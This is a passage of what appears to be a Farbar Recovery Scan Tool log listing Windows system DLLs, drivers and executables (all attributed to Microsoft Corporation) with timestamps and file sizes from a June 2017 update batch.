2017-06-29 08:42 - 2017-04-17 09:54 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
2017-06-29 08:42 - 2017-04-12 10:32 - 01483776 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-06-29 08:42 - 2017-04-12 10:32 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2017-06-29 08:42 - 2017-04-12 10:32 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2017-06-29 08:42 - 2017-04-12 10:32 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2017-06-29 08:42 - 2017-04-12 10:26 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2017-06-29 08:42 - 2017-04-12 10:25 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-06-29 08:42 - 2017-04-12 10:25 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2017-06-29 08:42 - 2017-04-12 10:25 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2017-06-29 08:42 - 2017-04-12 08:05 - 04296704 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2017-06-29 08:42 - 2017-04-07 10:34 - 00986856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-06-29 08:42 - 2017-04-07 10:34 - 00265448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-06-29 08:42 - 2017-04-07 10:30 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2017-06-29 08:42 - 2017-04-05 09:55 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-06-29 08:42 - 2017-04-05 09:55 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-06-29 08:42 - 2017-04-05 09:55 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-06-29 08:42 - 2017-04-04 10:34 - 01895656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2017-06-29 08:42 - 2017-04-04 10:34 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2017-06-29 08:42 - 2017-04-04 10:34 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2017-06-29 08:42 - 2017-04-04 09:53 - 00496128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2017-06-29 08:42 - 2017-03-30 10:03 - 00046080 _____ (Microsoft Corporation) C:\Windows\system32\rundll32.exe
2017-06-29 08:42 - 2017-03-30 09:58 - 00045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
2017-06-29 08:42 - 2017-03-16 10:31 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\vmsntfy.dll
2017-06-29 08:42 - 2017-03-10 11:32 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2017-06-29 08:42 - 2017-03-10 11:32 - 00300544 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2017-06-29 08:42 - 2017-03-10 11:20 - 01508352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pla.dll
2017-06-29 08:42 - 2017-03-10 11:20 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pdh.dll
2017-06-29 08:42 - 2017-03-10 10:57 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\plasrv.exe
2017-06-29 08:42 - 2017-03-10 10:55 - 00205312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2017-06-29 08:42 - 2017-03-10 10:55 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2017-06-29 08:42 - 2017-03-09 11:34 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-06-29 08:42 - 2017-03-09 11:19 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-06-29 08:42 - 2017-03-07 11:30 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2017-06-29 08:42 - 2017-03-07 11:17 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2017-06-29 08:42 - 2017-03-03 20:27 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-06-29 08:42 - 2017-03-03 20:14 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-06-29 08:42 - 2017-02-09 11:32 - 00769536 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-06-29 08:42 - 2017-02-09 11:32 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-06-29 08:42 - 2017-02-09 11:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-06-29 08:42 - 2017-02-09 11:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-06-29 08:42 - 2017-02-09 11:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-06-29 08:42 - 2017-02-09 11:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-06-29 08:42 - 2017-02-09 11:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-06-29 08:42 - 2017-02-09 11:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2017-06-29 08:42 - 2017-02-09 10:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:36 - 00011608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2017-06-29 08:42 - 2017-01-18 10:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2017-06-29 08:42 - 2017-01-13 13:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-06-29 08:42 - 2017-01-13 13:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-06-29 08:42 - 2017-01-13 12:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-06-29 08:42 - 2017-01-13 12:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-06-29 08:42 - 2017-01-12 12:37 - 00119808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storvsp.sys
2017-06-29 08:42 - 2017-01-12 12:37 - 00020992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\passthruparser.sys
2017-06-29 08:42 - 2017-01-12 12:37 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdparser.sys
2017-06-29 08:42 - 2017-01-11 13:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-06-29 08:42 - 2017-01-11 13:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-06-29 08:42 - 2017-01-11 12:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-06-29 08:42 - 2017-01-11 12:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-06-29 08:42 - 2016-11-21 13:12 - 00109568 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2017-06-29 08:42 - 2016-11-20 11:19 - 00084992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2017-06-29 08:42 - 2016-11-20 09:07 - 00467392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2017-06-29 08:42 - 2016-11-17 11:41 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2017-06-29 08:42 - 2016-11-10 11:32 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2017-06-29 08:42 - 2016-11-10 11:19 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2017-06-29 08:42 - 2016-11-09 11:41 - 00114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2017-06-29 08:42 - 2016-11-09 11:33 - 03244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2017-06-29 08:42 - 2016-11-09 11:33 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2017-06-29 08:42 - 2016-11-09 11:33 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2017-06-29 08:42 - 2016-11-09 11:33 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2017-06-29 08:42 - 2016-11-09 11:33 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2017-06-29 08:42 - 2016-11-09 11:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2017-06-29 08:42 - 2016-11-09 11:17 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2017-06-29 08:42 - 2016-11-09 11:17 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2017-06-29 08:42 - 2016-11-09 11:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2017-06-29 08:42 - 2016-11-09 11:02 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2017-06-29 08:42 - 2016-11-09 10:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2017-06-29 08:42 - 2016-10-11 10:32 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2017-06-29 08:42 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2017-06-29 08:42 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2017-06-29 08:42 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2017-06-29 08:42 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2017-06-29 08:42 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2017-06-29 08:42 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME
2017-06-29 08:42 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2017-06-29 08:42 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL
2017-06-29 08:42 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll
2017-06-29 08:42 - 2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime
2017-06-29 08:42 - 2016-10-11 10:18 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2017-06-29 08:42 - 2016-10-11 09:55 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\bcdedit.exe
2017-06-29 08:42 - 2016-10-11 08:18 - 00419648 _____ C:\Windows\SysWOW64\locale.nls
2017-06-29 08:42 - 2016-10-11 08:17 - 00419648 _____ C:\Windows\system32\locale.nls
2017-06-29 08:42 - 2016-10-08 08:06 - 00633296 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2017-06-29 08:42 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2017-06-29 08:42 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2017-06-29 08:42 - 2016-09-12 16:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2017-06-29 08:42 - 2016-09-12 15:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll
2017-06-29 08:42 - 2016-09-08 09:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2017-06-29 08:42 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2017-06-29 08:42 - 2016-08-12 11:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2017-06-29 08:42 - 2016-08-06 10:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2017-06-29 08:42 - 2016-08-06 10:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2017-06-29 08:42 - 2016-08-06 10:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2017-06-29 08:42 - 2016-08-06 10:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2017-06-29 08:42 - 2016-08-06 10:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2017-06-29 08:42 - 2016-08-06 10:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2017-06-29 08:42 - 2016-08-06 10:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2017-06-29 08:42 - 2016-08-06 10:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2017-06-29 08:42 - 2016-08-06 10:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2017-06-29 08:42 - 2016-08-06 10:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2017-06-29 08:42 - 2016-08-06 10:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2017-06-29 08:42 - 2016-08-06 10:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2017-06-29 08:42 - 2016-08-06 10:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2017-06-29 08:42 - 2016-08-06 09:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2017-06-29 08:42 - 2016-08-06 09:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2017-06-29 08:42 - 2016-08-06 09:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2017-06-29 08:42 - 2016-06-14 12:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2017-06-29 08:42 - 2016-06-14 12:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2017-06-29 08:42 - 2016-06-14 10:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2017-06-29 08:42 - 2016-06-14 10:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2017-06-29 08:42 - 2016-06-14 10:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2017-06-29 08:42 - 2016-06-14 10:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2017-06-29 08:42 - 2016-06-14 10:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2017-06-29 08:42 - 2016-06-14 10:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2017-06-29 08:42 - 2016-06-14 10:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2017-06-29 08:42 - 2016-05-12 08:05 - 00297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2017-06-29 08:42 - 2016-05-12 08:04 - 00249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2017-06-29 08:42 - 2016-03-23 17:43 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2017-06-29 08:42 - 2016-03-23 17:40 - 00546656 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2017-06-29 08:41 - 2016-05-11 12:02 - 00483840 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2017-06-29 08:41 - 2016-05-11 10:19 - 00363520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2017-06-29 08:41 - 2015-07-14 22:19 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2017-06-29 08:41 - 2015-04-24 13:17 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2017-06-29 08:41 - 2015-04-24 12:56 - 00530432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2017-06-29 08:41 - 2012-03-17 02:58 - 00075120 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2017-06-29 08:40 - 2015-11-11 13:53 - 01735680 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2017-06-29 08:40 - 2015-11-11 13:53 - 00525312 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2017-06-29 08:40 - 2015-11-11 13:39 - 01242624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2017-06-29 08:40 - 2015-11-11 13:39 - 00487936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2017-06-29 08:40 - 2014-12-18 22:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2017-06-29 08:40 - 2014-12-07 22:09 - 00406528 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll
2017-06-29 08:40 - 2014-12-07 21:46 - 00308224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll
2017-06-29 08:40 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2017-06-29 08:40 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2017-06-29 08:40 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2017-06-29 08:40 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2017-06-29 08:40 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2017-06-29 08:40 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2017-06-29 08:40 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2017-06-29 08:40 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2017-06-29 08:40 - 2014-03-04 04:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2017-06-29 08:40 - 2014-03-04 04:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2017-06-29 08:40 - 2014-03-04 04:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2017-06-29 08:40 - 2014-03-04 04:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2017-06-29 08:40 - 2014-03-04 04:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2017-06-29 08:40 - 2014-03-04 04:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2017-06-29 08:40 - 2014-03-04 04:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2017-06-29 08:40 - 2014-03-04 04:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
